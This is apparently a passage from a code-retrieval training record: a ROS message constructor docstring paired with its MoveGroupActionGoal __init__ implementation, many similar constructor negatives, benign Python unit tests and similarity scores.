s1b = self.hours_to_job_at_datetime(\n 'tz_test_job', 2011, 11, 6, 0, 50, 0)\n\n # From the PST vantage point, the run time is 21.8 and 45.8 hours away:\n s2a, s2b = self.hours_to_job_at_datetime(\n 'tz_test_job', 2011, 11, 6, 2, 10, 0)\n\n # Make sure the measurements are consistent for each vantage point,\n # meaning that each run is 24 hours apart no matter where you measure\n # from, even if the start time appears different for each vantage\n # point.\n self._assert_range(s1b - s1a, 23.99, 24.01)\n self._assert_range(s2b - s2a, 23.99, 24.01)\n\n # Start times should differ by 2.4 hours.\n self._assert_range(s1a - s2a, 2.39, 2.41)", "def test_travel_down_with_updates(self):\n travelcalculator = TravelCalculator(25, 50)\n with patch(\"time.time\") as mock_time:\n mock_time.return_value = 1580000000.0\n travelcalculator.set_position(40)\n travelcalculator.start_travel(100) # 15 seconds to reach 100\n\n # time not changed, still at beginning\n assert travelcalculator.current_position() == 40\n assert not travelcalculator.position_reached()\n assert travelcalculator.travel_direction == TravelStatus.DIRECTION_DOWN\n\n mock_time.return_value = 1580000002.0\n assert travelcalculator.current_position() == 48\n assert not travelcalculator.position_reached()\n # update from bus matching calculation\n travelcalculator.update_position(48)\n assert travelcalculator.current_position() == 48\n assert not travelcalculator.position_reached()\n\n mock_time.return_value = 1580000010.0\n assert travelcalculator.current_position() == 80\n assert not travelcalculator.position_reached()\n # update from bus not matching calculation takes precedence (1 second slower)\n travelcalculator.update_position(76)\n assert travelcalculator.current_position() == 76\n assert not travelcalculator.position_reached()\n # travel time extended by 1 second due to update from bus\n mock_time.return_value = 1580000015.0\n assert travelcalculator.current_position() == 96\n assert not travelcalculator.position_reached()\n mock_time.return_value = 1580000015.0 + 1\n assert travelcalculator.current_position() == 100\n assert travelcalculator.position_reached()", "def test_was_published_recently_with_old_todo(self):\n time = timezone.now() - datetime.timedelta(days=1, seconds=1)\n future_todo = TodoItem(pub_date=time)\n self.assertIs(future_todo.was_published_recently(), False)", "def test_delta_val(self):\n d = Delta(\"+-3\")\n self.assertEqual(d.cmp(0, 1), False)\n self.assertEqual(d.cmp(1, 4), False)\n self.assertEqual(d.cmp(1, 5), True)", "def test_calculate_supervisory_delta_put(self):\n SDP = calculate_supervisory_delta_put()\n \n self.assertEqual(SDP, -0.27)", "def test_does_die(self):\n self.herb.fitness = 0\n self.herb.params[\"omega\"] = 1\n nt.assert_true(self.herb.death())", "def test_does_not_die(self):\n self.herb.fitness = 1\n nt.assert_false(self.herb.death())", "def test_blind_delete(self):\r\n uid = uuid4()\r\n tmp = TestTimestampModel.create(id=uid, count=1)\r\n\r\n TestTimestampModel.get(id=uid).should.be.ok\r\n\r\n TestTimestampModel.objects(id=uid).timestamp(timedelta(seconds=5)).delete()\r\n\r\n with self.assertRaises(TestTimestampModel.DoesNotExist):\r\n TestTimestampModel.get(id=uid)\r\n\r\n tmp = TestTimestampModel.create(id=uid, count=1)\r\n\r\n with self.assertRaises(TestTimestampModel.DoesNotExist):\r\n TestTimestampModel.get(id=uid)", "def zero_failures(self) -> bool:\n return abs(self.failurerate) < 1e-7", "def test_negative_input(self):\n negative_data_down = np.full_like(\n self.cube_uv_down.data, 
dtype=np.float32, fill_value=-0.1\n )\n negative_uv_down = self.cube_uv_down.copy(data=negative_data_down)\n msg = (\n \"The radiation flux in UV downward contains data \"\n \"that is negative or NaN. Data should be >= 0.\"\n )\n with self.assertRaisesRegex(ValueError, msg):\n calculate_uv_index(negative_uv_down)", "def test_coming_up_two_days_past(self):\n time = timezone.now() + datetime.timedelta(days=-2)\n tomorrow_event = Event(event_date=time)\n self.assertIs(tomorrow_event.coming_up(), False)", "def test_notSetDeadline(self):\n self.assertEqual(None, self.session.getRemainingTime())", "def test_dejitter_timestamps():\n n_steps = 100\n n_tests = 50\n sfreqs = np.linspace(1, 5000, n_tests).astype(int)\n last_times = np.random.randint(-100, 100, size=n_tests)\n test_timestamps = np.random.random((n_tests, n_steps)) + np.arange(n_steps)\n expected_timestamps = [np.arange(n_steps)/sfreq + last_times[i] + 1/sfreq\n for i, sfreq in enumerate(sfreqs)]\n for i, args in enumerate(zip(test_timestamps, sfreqs, last_times)):\n dejittered = acquire.dejitter_timestamps(*args)\n # there may be some floating-point errors, so just make sure the\n # difference is tiny\n assert np.all((dejittered - expected_timestamps[i]) < 1e-14)" ]
[ "0.7007831", "0.6637345", "0.6576894", "0.6474647", "0.64391077", "0.6374031", "0.6313927", "0.6297262", "0.62733597", "0.6259941", "0.62490773", "0.62064755", "0.62022203", "0.6191", "0.6171475", "0.61501443", "0.610897", "0.6103212", "0.6097491", "0.609512", "0.6081113", "0.6078611", "0.6055014", "0.60354775", "0.6035291", "0.60194445", "0.6000014", "0.5996328", "0.59930754", "0.59916365", "0.59891975", "0.5987591", "0.59698844", "0.59584165", "0.59458506", "0.59400475", "0.58992374", "0.5897231", "0.5891707", "0.58915406", "0.5891442", "0.58790684", "0.58773285", "0.5876486", "0.58748245", "0.58709466", "0.58703154", "0.58629996", "0.58614624", "0.5860151", "0.5859797", "0.5859504", "0.58542204", "0.5843233", "0.58321273", "0.5830445", "0.5820167", "0.5815123", "0.5809749", "0.58067614", "0.5798627", "0.57927394", "0.5791354", "0.5784595", "0.5784368", "0.57823044", "0.57749975", "0.5771128", "0.5771017", "0.57633066", "0.5753922", "0.574065", "0.57391346", "0.5733609", "0.5733281", "0.5731281", "0.5725819", "0.57216823", "0.5714457", "0.57031333", "0.56980324", "0.5696622", "0.567878", "0.56698495", "0.5668745", "0.5664832", "0.5662515", "0.56602347", "0.5659865", "0.56570274", "0.5654393", "0.56530595", "0.56524444", "0.56480247", "0.5639028", "0.56382066", "0.56372654", "0.56313366", "0.56275594", "0.5623953" ]
0.6970346
1
Constructor. Any message fields that are implicitly/explicitly set to None will be assigned a default value. The recommended use is keyword arguments as this is more robust to future message changes. You cannot mix in-order arguments and keyword arguments.
def __init__(self, *args, **kwds): if args or kwds: super(MoveGroupActionGoal, self).__init__(*args, **kwds) #message fields cannot be None, assign default values for those that are if self.header is None: self.header = std_msgs.msg.Header() if self.goal_id is None: self.goal_id = actionlib_msgs.msg.GoalID() if self.goal is None: self.goal = moveit_msgs.msg.MoveGroupGoal() else: self.header = std_msgs.msg.Header() self.goal_id = actionlib_msgs.msg.GoalID() self.goal = moveit_msgs.msg.MoveGroupGoal()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, *args, **kwds):\n if args or kwds:\n super(KomodoSpeechRecCommand, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.cmd is None:\n self.cmd = ''\n if self.cat is None:\n self.cat = ''\n else:\n self.header = std_msgs.msg.Header()\n self.cmd = ''\n self.cat = ''", "def __init__(self, message=None):\n self.message = message", "def __init__(self, message=None):\n self.message = message", "def __init__(self, message=None) -> None:\n super().__init__(message)", "def __init__(self, message: str = None, **kwargs):\n self.message = message\n self.kwargs = kwargs\n self.args = {}\n self.args['message'] = self.message\n self.args['args'] = self.kwargs", "def __init__(self, message=None):\n\n self._message = message", "def __init__(self, message, *args, **kwargs):\n self.message = message\n super().__init__(*args, **kwargs)", "def __init__(self, message: str) -> None:\n self.message = message", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(AlignModelSrvRequest, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.model is None:\n self.model = articulation_msgs.msg.ModelMsg()\n if self.data is None:\n self.data = articulation_msgs.msg.ModelMsg()\n else:\n self.model = articulation_msgs.msg.ModelMsg()\n self.data = articulation_msgs.msg.ModelMsg()", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(ManipTaskActionGoal, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.goal_id is None:\n self.goal_id = actionlib_msgs.msg.GoalID()\n if self.goal is None:\n self.goal = coordinator.msg.ManipTaskGoal()\n else:\n self.header = std_msgs.msg.Header()\n self.goal_id = actionlib_msgs.msg.GoalID()\n self.goal = coordinator.msg.ManipTaskGoal()", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(PanTiltFdbk, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.pan is None:\n self.pan = movo_msgs.msg.PanTiltActuatorFdbk()\n if self.tilt is None:\n self.tilt = movo_msgs.msg.PanTiltActuatorFdbk()\n else:\n self.header = std_msgs.msg.Header()\n self.pan = movo_msgs.msg.PanTiltActuatorFdbk()\n self.tilt = movo_msgs.msg.PanTiltActuatorFdbk()", "def __init__(self, level=None, message=None, process_id=None, user_name=None, timestamp=None):\n\n self._level = None\n self._message = None\n self._process_id = None\n self._user_name = None\n self._timestamp = None\n\n if level is not None:\n self.level = level\n if message is not None:\n self.message = message\n if process_id is not None:\n self.process_id = process_id\n if user_name is not None:\n self.user_name = user_name\n if timestamp is not None:\n self.timestamp = timestamp", "def __init__(self, message: str) -> None:\n\n super().__init__(message)", "def __init__(self, message: str) -> None:\n\n super().__init__(message)", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(DrivetrainCommand, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg._Header.Header()\n if self.gear is None:\n self.gear = 0\n if self.front_diff is None:\n self.front_diff = 
0\n if self.rear_diff is None:\n self.rear_diff = 0\n else:\n self.header = std_msgs.msg._Header.Header()\n self.gear = 0\n self.front_diff = 0\n self.rear_diff = 0", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message: str):\n\n self.message = message", "def __init__(self, message):\n super().__init__(message)\n self.message = message", "def __init__(self, message: str):\n self.message = message", "def __init__(self, message: str):\n self.message = message", "def __init__(self, message: str):\n self.message = message", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(RobotDescription, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.robot_id is None:\n self.robot_id = opil_v2.msg.Id()\n if self.agv_msg is None:\n self.agv_msg = opil_v2.msg.RobotDescriptionAGV()\n else:\n self.header = std_msgs.msg.Header()\n self.robot_id = opil_v2.msg.Id()\n self.agv_msg = opil_v2.msg.RobotDescriptionAGV()", "def __init__(self, message):\r\n self.__message = message", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(sbpl_msg, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.sbpl_wait_flag is None:\n self.sbpl_wait_flag = False\n if self.sbpl_present_x is None:\n self.sbpl_present_x = 0\n if self.sbpl_present_y is None:\n self.sbpl_present_y = 0\n if self.sbpl_new_x is None:\n self.sbpl_new_x = 0\n if self.sbpl_new_y is None:\n self.sbpl_new_y = 0\n if self.start_P3DX_motion is None:\n self.start_P3DX_motion = False\n else:\n self.sbpl_wait_flag = False\n self.sbpl_present_x = 0\n self.sbpl_present_y = 0\n self.sbpl_new_x = 0\n self.sbpl_new_y = 0\n self.start_P3DX_motion = False", "def __init__(self, message: str) -> None:\n super().__init__(message)", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(IrTransformMsg, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.s1 is None:\n self.s1 = False\n if self.s2 is None:\n self.s2 = False\n if self.s3 is None:\n self.s3 = False\n if self.s4 is None:\n self.s4 = False\n if self.p1 is None:\n self.p1 = geometry_msgs.msg.PointStamped()\n if self.p2 is None:\n self.p2 = geometry_msgs.msg.PointStamped()\n if self.p3 is None:\n self.p3 = geometry_msgs.msg.PointStamped()\n if self.p4 is None:\n self.p4 = geometry_msgs.msg.PointStamped()\n else:\n self.s1 = False\n self.s2 = False\n self.s3 = False\n self.s4 = False\n self.p1 = geometry_msgs.msg.PointStamped()\n self.p2 = geometry_msgs.msg.PointStamped()\n self.p3 = geometry_msgs.msg.PointStamped()\n self.p4 = geometry_msgs.msg.PointStamped()", "def __init__(self, buf=None, *args, **kwargs):\n super(Message, self).__init__(buf, *args, **kwargs)\n self.__initialized = True", "def __init__(self, message):\n self.message = message", "def __init__(self, message):\n self.message = 
message", "def __init__(self, message):\n self.message = message", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(CAMERA_DATA_MSG, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.messageID is None:\n self.messageID = 0\n if self.localStamp is None:\n self.localStamp = vehicle_msgs.msg.FrameStamp()\n if self.globalStamp is None:\n self.globalStamp = vehicle_msgs.msg.FrameStamp()\n if self.camera is None:\n self.camera = vehicle_msgs.msg.Camera()\n if self.camera_obj is None:\n self.camera_obj = [vehicle_msgs.msg.Camera_Obj() for _ in range(10)]\n if self.camera_lane is None:\n self.camera_lane = vehicle_msgs.msg.Camera_Lane()\n else:\n self.header = std_msgs.msg.Header()\n self.messageID = 0\n self.localStamp = vehicle_msgs.msg.FrameStamp()\n self.globalStamp = vehicle_msgs.msg.FrameStamp()\n self.camera = vehicle_msgs.msg.Camera()\n self.camera_obj = [vehicle_msgs.msg.Camera_Obj() for _ in range(10)]\n self.camera_lane = vehicle_msgs.msg.Camera_Lane()", "def __init__(self, message='', incomplete=True):\n super().__init__(message)\n self.incomplete = incomplete", "def testConstructorKwargs(self):\n class SomeMessage(messages.Message):\n name = messages.StringField(1)\n number = messages.IntegerField(2)\n\n expected = SomeMessage()\n expected.name = 'my name'\n expected.number = 200\n self.assertEquals(expected, SomeMessage(name='my name', number=200))", "def __init__(self, msg=None):\n if msg is None:\n msg = \"That bonehead {author} should really hear your rage about this disgraceful result! Feel free to tell them at {email}\".format(\n author=__author__, email=__email__)\n\n self.args = (msg, *self.args)", "def __init__(self, message):\n super().__init__()\n self._message = message", "def __init__(self, customMessage=\"custom message\"):\n self.customMessage = customMessage", "def __init__(self,msg) -> None:\n\n super().__init__(self)\n self.msg=msg", "def __init__(self, msg=\"\"):\n self._msg = msg\n super().__init__()", "def __init__(self, message):\n super().__init__(message)", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(VescCtrlStamped, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.control is None:\n self.control = vesc_msgs.msg.VescCtrl()\n else:\n self.header = std_msgs.msg.Header()\n self.control = vesc_msgs.msg.VescCtrl()", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(pid_control_reqResponse, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.FL_vel is None:\n self.FL_vel = 0\n if self.FR_vel is None:\n self.FR_vel = 0\n if self.BL_vel is None:\n self.BL_vel = 0\n if self.BR_vel is None:\n self.BR_vel = 0\n else:\n self.FL_vel = 0\n self.FR_vel = 0\n self.BL_vel = 0\n self.BR_vel = 0", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(pid_control_reqRequest, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.yaw is None:\n self.yaw = 0.\n else:\n self.yaw = 0.", "def __init__(\n self,\n code: typing.Optional[int] = None,\n message: typing.Optional[str] = None,\n ) -> None:\n super().__init__()\n self.code = code\n self.message = message", "def __init__(\n self,\n code: typing.Optional[int] = None,\n message: typing.Optional[str] = 
None,\n ) -> None:\n super().__init__()\n self.code = code\n self.message = message", "def __init__(self, message=\"\"):\n\n self._message = message\n self._startTime = time.time()", "def __init__(self, msg: str):\n self.msg = msg", "def __init__(self, message: str, value, expected):\n super().__init__(message, value, expected)\n self.message = message\n self.value = value\n self.expected = expected", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(ConductorGraph, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.pending is None:\n self.pending = []\n if self.available is None:\n self.available = []\n if self.missing is None:\n self.missing = []\n if self.gone is None:\n self.gone = []\n else:\n self.pending = []\n self.available = []\n self.missing = []\n self.gone = []", "def __init__(self, msg):\n\n self.msg = msg", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(CoachInfo, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.MatchMode is None:\n self.MatchMode = 0\n if self.MatchType is None:\n self.MatchType = 0\n if self.TestMode is None:\n self.TestMode = 0\n if self.pointA is None:\n self.pointA = nubot_common.msg.Point2d()\n if self.pointB is None:\n self.pointB = nubot_common.msg.Point2d()\n if self.angleA is None:\n self.angleA = 0\n if self.angleB is None:\n self.angleB = 0\n if self.idA is None:\n self.idA = 0\n if self.idB is None:\n self.idB = 0\n if self.kickforce is None:\n self.kickforce = 0\n else:\n self.header = std_msgs.msg.Header()\n self.MatchMode = 0\n self.MatchType = 0\n self.TestMode = 0\n self.pointA = nubot_common.msg.Point2d()\n self.pointB = nubot_common.msg.Point2d()\n self.angleA = 0\n self.angleB = 0\n self.idA = 0\n self.idB = 0\n self.kickforce = 0", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, msg):\n self.msg = msg", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(Actors, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.actors is None:\n self.actors = []\n else:\n self.header = std_msgs.msg.Header()\n self.actors = []", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(InitialSceneResponse, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.tsp_turtles is None:\n self.tsp_turtles = ''\n if self.conveyor_turtle is None:\n self.conveyor_turtle = ''\n if self.catch_turtle is None:\n self.catch_turtle = ''\n else:\n self.tsp_turtles = ''\n self.conveyor_turtle = ''\n self.catch_turtle = ''", "def __init__(self, *args):\n\n super(GoveeException, self).__init__()\n\n if args:\n self.message = args[0]\n else:\n self.message = None", "def 
__init__(self, *args, **kwds):\n if args or kwds:\n super(FilterStepInfo, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.step_num is None:\n self.step_num = 0\n if self.info_type is None:\n self.info_type = 0\n if self.predict is None:\n self.predict = argus_msgs.msg.FilterPredictStep()\n if self.update is None:\n self.update = argus_msgs.msg.FilterUpdateStep()\n else:\n self.header = std_msgs.msg.Header()\n self.step_num = 0\n self.info_type = 0\n self.predict = argus_msgs.msg.FilterPredictStep()\n self.update = argus_msgs.msg.FilterUpdateStep()", "def __init__(self, peer, text, direction, status=None, timestamp=None, **kargs):\n super(Message, self).__init__()\n storage = None\n\n self.peer = TelNumber.as_type(peer)\n self.text = Text.as_type(text)\n self.timestamp = Time.as_type(timestamp)\n # TODO: use a boolean here\n assert direction in ['in', 'out'], direction\n self.direction = direction\n self.status = status or direction == 'out' and 'read' or 'unread'\n assert self.status in ['read', 'unread', 'unsent', 'sent'], status", "def __init__(__self__, *,\n code: Optional[pulumi.Input[str]] = None,\n message: Optional[pulumi.Input[str]] = None):\n if code is not None:\n pulumi.set(__self__, \"code\", code)\n if message is not None:\n pulumi.set(__self__, \"message\", message)", "def __init__(self):\n\n # universal message variables\n self.text = None\n self.files = []\n self.keywords = []\n self.performers = []\n self.hasPerformers = False # used to flag files from performer folders\n ## message only variables\n self.price = None # $3 - $100\n self.users = [] # users to send to\n ## post only variables\n self.expiration = None\n self.poll = None\n self.schedule = None\n ##\n self.gotten = False", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(DahuaQrcodeScanData, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.Header is None:\n self.Header = std_msgs.msg.Header()\n if self.x_pos is None:\n self.x_pos = 0\n if self.y_pos is None:\n self.y_pos = 0\n if self.angle is None:\n self.angle = 0\n if self.code_type is None:\n self.code_type = 0\n if self.code_num is None:\n self.code_num = 0\n else:\n self.Header = std_msgs.msg.Header()\n self.x_pos = 0\n self.y_pos = 0\n self.angle = 0\n self.code_type = 0\n self.code_num = 0", "def testValidate_Optional(self):\n class SimpleMessage(messages.Message):\n non_required = messages.IntegerField(1)\n\n simple_message = SimpleMessage()\n simple_message.check_initialized()\n simple_message.non_required = 10\n simple_message.check_initialized()", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(GetPlanningSceneRequest, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.planning_scene_diff is None:\n self.planning_scene_diff = arm_navigation_msgs.msg.PlanningScene()\n if self.operations is None:\n self.operations = arm_navigation_msgs.msg.OrderedCollisionOperations()\n else:\n self.planning_scene_diff = arm_navigation_msgs.msg.PlanningScene()\n self.operations = arm_navigation_msgs.msg.OrderedCollisionOperations()", "def __init__(self, message=None, details=None, **kw):\n if not message:\n message = self.defaultMessage\n\n self.message = message\n self.details = details\n self.traceback = traceback.format_exc()", "def __init__(self, message):\n self.vars = {}\n 
self.vars['message'] = message", "def __init__(self, data, attributes=None, *args, **kwargs):\n\n super(PublisherMessage, self).__init__(*args, **kwargs)\n\n self.data = data\n self.attributes = attributes or {}", "def __init__(self, msg: str) -> None:\n ...", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(FeedbackMsg, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.name is None:\n self.name = []\n if self.position is None:\n self.position = []\n if self.velocity is None:\n self.velocity = []\n if self.effort is None:\n self.effort = []\n if self.position_command is None:\n self.position_command = []\n if self.velocity_command is None:\n self.velocity_command = []\n if self.effort_command is None:\n self.effort_command = []\n if self.accelerometer is None:\n self.accelerometer = []\n if self.gyro is None:\n self.gyro = []\n if self.orientation is None:\n self.orientation = []\n if self.deflection is None:\n self.deflection = []\n if self.deflection_velocity is None:\n self.deflection_velocity = []\n if self.motor_velocity is None:\n self.motor_velocity = []\n if self.motor_current is None:\n self.motor_current = []\n if self.motor_winding_current is None:\n self.motor_winding_current = []\n if self.motor_sensor_temperature is None:\n self.motor_sensor_temperature = []\n if self.motor_winding_temperature is None:\n self.motor_winding_temperature = []\n if self.motor_housing_temperature is None:\n self.motor_housing_temperature = []\n if self.board_temperature is None:\n self.board_temperature = []\n if self.processor_temperature is None:\n self.processor_temperature = []\n if self.voltage is None:\n self.voltage = []\n if self.led_color is None:\n self.led_color = []\n if self.sequence_number is None:\n self.sequence_number = []\n if self.receive_time is None:\n self.receive_time = []\n if self.transmit_time is None:\n self.transmit_time = []\n if self.hardware_receive_time is None:\n self.hardware_receive_time = []\n if self.hardware_transmit_time is None:\n self.hardware_transmit_time = []\n else:\n self.name = []\n self.position = []\n self.velocity = []\n self.effort = []\n self.position_command = []\n self.velocity_command = []\n self.effort_command = []\n self.accelerometer = []\n self.gyro = []\n self.orientation = []\n self.deflection = []\n self.deflection_velocity = []\n self.motor_velocity = []\n self.motor_current = []\n self.motor_winding_current = []\n self.motor_sensor_temperature = []\n self.motor_winding_temperature = []\n self.motor_housing_temperature = []\n self.board_temperature = []\n self.processor_temperature = []\n self.voltage = []\n self.led_color = []\n self.sequence_number = []\n self.receive_time = []\n self.transmit_time = []\n self.hardware_receive_time = []\n self.hardware_transmit_time = []", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(GraspConfig, self).__init__(*args, **kwds)\n # message fields cannot be None, assign default values for those that are\n if self.position is None:\n self.position = geometry_msgs.msg.Point()\n if self.approach is None:\n self.approach = geometry_msgs.msg.Vector3()\n if self.binormal is None:\n self.binormal = geometry_msgs.msg.Vector3()\n if self.axis is None:\n self.axis = geometry_msgs.msg.Vector3()\n if self.width is None:\n self.width = std_msgs.msg.Float32()\n if self.score is None:\n self.score = std_msgs.msg.Float32()\n if self.sample is None:\n self.sample = geometry_msgs.msg.Point()\n else:\n self.position = 
geometry_msgs.msg.Point()\n self.approach = geometry_msgs.msg.Vector3()\n self.binormal = geometry_msgs.msg.Vector3()\n self.axis = geometry_msgs.msg.Vector3()\n self.width = std_msgs.msg.Float32()\n self.score = std_msgs.msg.Float32()\n self.sample = geometry_msgs.msg.Point()", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(sslDebug_Data, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.id is None:\n self.id = ''\n if self.line is None:\n self.line = []\n if self.circle is None:\n self.circle = []\n else:\n self.id = ''\n self.line = []\n self.circle = []", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(InitialSceneRequest, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.numberOfTSPTurtles is None:\n self.numberOfTSPTurtles = 0\n else:\n self.numberOfTSPTurtles = 0", "def __init__(self, msg, final=False):\n self.__msg = msg\n self.final = final", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(EncounterV, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.cnt is None:\n self.cnt = []\n else:\n self.cnt = []", "def __init__(self, message_type: LogType, message: str):\n self.timestamp = datetime.datetime.now().strftime(\"%m-%d-%Y %I:%M:%S %p\")\n self.message = message\n self.message_type = message_type", "def __init__(self):\n self.type = None\n self.msg = \"\"\n self.process = None\n self.edge_id = None", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(RotationMatrix, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.c0 is None:\n self.c0 = bh_motion.msg.Vector3()\n if self.c1 is None:\n self.c1 = bh_motion.msg.Vector3()\n if self.c2 is None:\n self.c2 = bh_motion.msg.Vector3()\n else:\n self.c0 = bh_motion.msg.Vector3()\n self.c1 = bh_motion.msg.Vector3()\n self.c2 = bh_motion.msg.Vector3()", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(WorldModelInfo, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.obstacleinfo is None:\n self.obstacleinfo = nubot_common.msg.ObstaclesInfo()\n if self.oppinfo is None:\n self.oppinfo = nubot_common.msg.ObstaclesInfo()\n if self.robotinfo is None:\n self.robotinfo = []\n if self.ballinfo is None:\n self.ballinfo = []\n if self.coachinfo is None:\n self.coachinfo = nubot_common.msg.CoachInfo()\n if self.pass_cmd is None:\n self.pass_cmd = nubot_common.msg.PassCommands()\n else:\n self.header = std_msgs.msg.Header()\n self.obstacleinfo = nubot_common.msg.ObstaclesInfo()\n self.oppinfo = nubot_common.msg.ObstaclesInfo()\n self.robotinfo = []\n self.ballinfo = []\n self.coachinfo = nubot_common.msg.CoachInfo()\n self.pass_cmd = nubot_common.msg.PassCommands()", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(GetPlanningSceneResponse, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.planning_scene is None:\n self.planning_scene = arm_navigation_msgs.msg.PlanningScene()\n else:\n self.planning_scene = arm_navigation_msgs.msg.PlanningScene()", "def __init__(self, message: str) -> None:\n\n self.message = message if message[-1] == '.' 
else message + '.'", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(MPC_ACCResponse, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.i is None:\n self.i = 0.\n else:\n self.i = 0.", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(VideoImage, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.unique_key is None:\n self.unique_key = 0\n if self.gps_week is None:\n self.gps_week = 0\n if self.gps_millisecond is None:\n self.gps_millisecond = 0\n if self.video_id is None:\n self.video_id = 0\n if self.image is None:\n self.image = autonavigation.msg.Image()\n else:\n self.unique_key = 0\n self.gps_week = 0\n self.gps_millisecond = 0\n self.video_id = 0\n self.image = autonavigation.msg.Image()", "def __init__(self, message, *args, **kwargs):\n Job.Service.__init__(self, *args, **kwargs)\n self.message = message" ]
[ "0.77939296", "0.7720264", "0.7720264", "0.76866186", "0.7626193", "0.756387", "0.74395823", "0.7416946", "0.7308225", "0.72806025", "0.72379386", "0.72272825", "0.7224187", "0.7224187", "0.7218873", "0.7211484", "0.7211484", "0.7211484", "0.7211484", "0.7211484", "0.7211484", "0.7211484", "0.7211484", "0.7211484", "0.7211484", "0.72090733", "0.7202682", "0.7202682", "0.7202682", "0.7200424", "0.71962625", "0.7187075", "0.71858245", "0.7139403", "0.71326554", "0.71310747", "0.71310747", "0.71310747", "0.71298164", "0.7127749", "0.7115115", "0.7110097", "0.7060733", "0.70520115", "0.70310014", "0.6974384", "0.6969823", "0.6953688", "0.6949925", "0.6924152", "0.6898258", "0.6898258", "0.68979895", "0.6878055", "0.68626255", "0.68594253", "0.6841009", "0.6802866", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6793185", "0.6772085", "0.6763147", "0.67316407", "0.6728909", "0.67178714", "0.67095923", "0.6702592", "0.66978854", "0.668233", "0.6656379", "0.66559416", "0.66460854", "0.66215485", 